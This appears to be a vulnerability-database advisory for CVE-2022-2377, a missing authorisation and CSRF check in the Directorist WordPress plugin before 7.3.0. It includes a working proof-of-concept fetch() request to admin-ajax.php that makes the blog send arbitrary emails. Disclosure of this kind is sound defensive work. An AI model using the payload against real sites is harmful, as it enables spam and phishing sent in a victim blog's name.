Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitKrzysztof ZającWPEX-ID:F4E606E9-0664-42FB-A59B-21DE306EB530
HistoryJul 26, 2022 - 12:00 a.m.

Directorist < 7.3.0 - Subscriber+ Arbitrary E-mail Sending

2022-07-2600:00:00
Krzysztof Zając
69
directorist 7.3.0
subscriber+ arbitrary
e-mail sending
admin-ajax.php
content-type
post method
exploit

EPSS

0.001

Percentile

21.2%

JSON

The plugin does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated users to send arbitrary emails on behalf of the blog

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=atbdp_send_announcement&[email protected]&subject=subject&message=content&send_to_email=1",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Related

nvd 1
patchstack 1
cvelist 1
cve 1
wpvulndb 1
prion 1
nvd
nvd
CVE-2022-2377
2022-08-22 15:15:14
patchstack
patchstack
WordPress Directorist plugin <= 7.2.3 - Authenticated Arbitrary E-mail Sending vulnerability
2022-07-26 00:00:00
cvelist
cvelist
CVE-2022-2377 Directorist < 7.3.0 - Subscriber+ Arbitrary E-mail Sending
2022-08-22 15:02:09
cve
cve
CVE-2022-2377
2022-08-22 15:15:14
wpvulndb
wpvulndb
Directorist < 7.3.0 - Subscriber+ Arbitrary E-mail Sending
2022-07-26 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-08-22 15:15:00

EPSS

0.001

Percentile

21.2%

JSON
Related for WPEX-ID:F4E606E9-0664-42FB-A59B-21DE306EB530
nvd1patchstack1cvelist1cve1wpvulndb1prion1